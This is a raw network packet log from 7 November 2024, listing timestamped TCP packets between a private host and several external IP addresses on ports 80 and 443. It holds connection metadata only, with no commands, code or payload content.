Nov 7, 2024 07:33:24.814577103 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.814589024 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.814601898 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.814611912 CET	443	49888	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:24.814640999 CET	443	49888	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:24.814656973 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.814660072 CET	443	49888	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:24.814661026 CET	49888	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:24.814691067 CET	443	49888	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:24.814702034 CET	49888	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:24.814908028 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.815001965 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.815013885 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.815021992 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.815027952 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.815032005 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.815042019 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.815042973 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.815052986 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.815066099 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.815074921 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.815108061 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.815501928 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.815512896 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.815521955 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.815531969 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.815543890 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.815551996 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.815552950 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.815562963 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.815572023 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.815572023 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.815589905 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.815613985 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.816014051 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.816023111 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.816032887 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.816044092 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.816052914 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.816060066 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.816062927 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.816073895 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.816083908 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.816087961 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.816093922 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.816103935 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.816112995 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.816129923 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.816133976 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.816138983 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.816143036 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.816148043 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.816149950 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.816174030 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.816190958 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.816932917 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.816943884 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.816952944 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.816962957 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.816972971 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.816982985 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.816988945 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.816992044 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.817003012 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.817013979 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.817023039 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.817034006 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.817034960 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.817044020 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.817056894 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.817066908 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.817075968 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.817080975 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.817089081 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.817130089 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.817871094 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.817883015 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.817898035 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.817909956 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.817919970 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.817930937 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.817933083 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.817940950 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.817951918 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.817955971 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.817965031 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.817975044 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.817975044 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.817986965 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.817992926 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.817996025 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.818001986 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.818011999 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.818021059 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.818026066 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.818031073 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.818038940 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.818051100 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.818061113 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.818065882 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.818097115 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.818581104 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.818605900 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.818617105 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.818619013 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.818627119 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.818638086 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.818639994 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.818649054 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.818659067 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.818660975 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.818669081 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.818679094 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.818685055 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.818689108 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.818698883 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.818701029 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.818710089 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.818717957 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.818720102 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.818728924 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.818741083 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.818762064 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.818773985 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.819257975 CET	443	49888	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:24.819351912 CET	49888	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:24.819360018 CET	443	49888	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:24.822777033 CET	443	49888	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:24.822849035 CET	49888	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:24.822854042 CET	443	49888	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:24.828074932 CET	443	49888	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:24.828123093 CET	49888	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:24.828129053 CET	443	49888	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:24.833631992 CET	443	49888	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:24.833822966 CET	49888	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:24.833828926 CET	443	49888	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:24.839428902 CET	443	49888	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:24.839484930 CET	49888	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:24.839489937 CET	443	49888	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:24.845494032 CET	443	49888	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:24.845552921 CET	49888	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:24.845558882 CET	443	49888	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:24.851139069 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.851160049 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.851180077 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.851210117 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.851222038 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.851320028 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.851332903 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.851345062 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.851356030 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.851368904 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.851387978 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.851421118 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.851480961 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.851491928 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.851522923 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.851593018 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.851603031 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.851613045 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.851635933 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.851654053 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.851783991 CET	443	49888	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:24.851840019 CET	443	49888	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:24.851881981 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.851886034 CET	49888	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:24.851892948 CET	443	49888	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:24.851893902 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.851905107 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.851913929 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.851953030 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.851953983 CET	49888	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:24.851994038 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.852005005 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.852031946 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.852047920 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.852057934 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.852067947 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.852078915 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.852082014 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.852112055 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.852317095 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.852327108 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.852335930 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.852345943 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.852361917 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.852386951 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.857382059 CET	443	49888	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:24.863768101 CET	443	49888	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:24.863811016 CET	49888	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:24.863816977 CET	443	49888	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:24.867307901 CET	443	49893	172.240.127.234	192.168.2.4
Nov 7, 2024 07:33:24.867383957 CET	443	49893	172.240.127.234	192.168.2.4
Nov 7, 2024 07:33:24.867621899 CET	49893	443	192.168.2.4	172.240.127.234
Nov 7, 2024 07:33:24.869651079 CET	443	49888	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:24.869828939 CET	49888	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:24.869834900 CET	443	49888	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:24.872741938 CET	49893	443	192.168.2.4	172.240.127.234
Nov 7, 2024 07:33:24.872750044 CET	443	49893	172.240.127.234	192.168.2.4
Nov 7, 2024 07:33:24.872759104 CET	49893	443	192.168.2.4	172.240.127.234
Nov 7, 2024 07:33:24.872808933 CET	49893	443	192.168.2.4	172.240.127.234
Nov 7, 2024 07:33:24.875550032 CET	443	49888	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:24.875680923 CET	49888	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:24.875685930 CET	443	49888	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:24.878748894 CET	49899	443	192.168.2.4	172.240.127.234
Nov 7, 2024 07:33:24.878768921 CET	443	49899	172.240.127.234	192.168.2.4
Nov 7, 2024 07:33:24.878823042 CET	49899	443	192.168.2.4	172.240.127.234
Nov 7, 2024 07:33:24.879221916 CET	49899	443	192.168.2.4	172.240.127.234
Nov 7, 2024 07:33:24.879230022 CET	443	49899	172.240.127.234	192.168.2.4
Nov 7, 2024 07:33:24.881654024 CET	443	49888	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:24.881695986 CET	49888	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:24.881701946 CET	443	49888	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:24.887793064 CET	443	49888	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:24.887861013 CET	443	49888	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:24.887864113 CET	49888	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:24.887870073 CET	443	49888	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:24.887919903 CET	49888	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:24.893780947 CET	443	49888	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:24.899741888 CET	443	49888	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:24.899785042 CET	49888	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:24.899791002 CET	443	49888	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:24.920561075 CET	443	49896	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:24.927339077 CET	49896	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:24.927354097 CET	443	49896	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:24.927771091 CET	49896	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:24.927774906 CET	443	49896	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:24.928208113 CET	443	49888	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:24.928252935 CET	49888	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:24.928260088 CET	443	49888	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:24.928288937 CET	443	49888	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:24.928329945 CET	49888	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:24.928334951 CET	443	49888	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:24.928575993 CET	443	49888	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:24.928651094 CET	443	49888	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:24.928684950 CET	443	49888	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:24.928706884 CET	49888	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:24.928714991 CET	443	49888	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:24.928731918 CET	49888	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:24.930865049 CET	443	49888	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:24.930911064 CET	49888	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:24.930917025 CET	443	49888	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:24.931049109 CET	443	49888	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:24.931207895 CET	49888	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:24.931214094 CET	443	49888	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:24.933278084 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.933296919 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.933317900 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.933335066 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.933363914 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.933398008 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.933466911 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.933505058 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.933538914 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.933552027 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.933587074 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.933711052 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.933722019 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.933737040 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.933748007 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.933751106 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.933759928 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.933780909 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.933805943 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.933959007 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.933980942 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.934003115 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.934020996 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.934067011 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.934077024 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.934087038 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.934107065 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.934128046 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.934324026 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.934334040 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.934343100 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.934354067 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.934365034 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.934369087 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.934376955 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.934387922 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.934387922 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.934406042 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.934416056 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.934428930 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.934454918 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.934626102 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.934637070 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.934672117 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.934700966 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.934798002 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.934807062 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.934817076 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.934828043 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.934838057 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.934865952 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.934979916 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.934992075 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.935003042 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.935015917 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.935026884 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.935028076 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.935039997 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.935051918 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.935072899 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.935241938 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.935254097 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.935264111 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.935276031 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.935283899 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.935287952 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.935306072 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.935331106 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.935359955 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.935372114 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.935383081 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.935395002 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.935403109 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.935405970 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.935417891 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.935420036 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.935429096 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.935440063 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.935451031 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.935452938 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.935463905 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.935487986 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.936136007 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.936146021 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.936156988 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.936167955 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.936178923 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.936187029 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.936189890 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.936201096 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.936212063 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.936228037 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.936228991 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.936242104 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.936249018 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.936253071 CET	80	49882	185.215.113.16	192.168.2.4
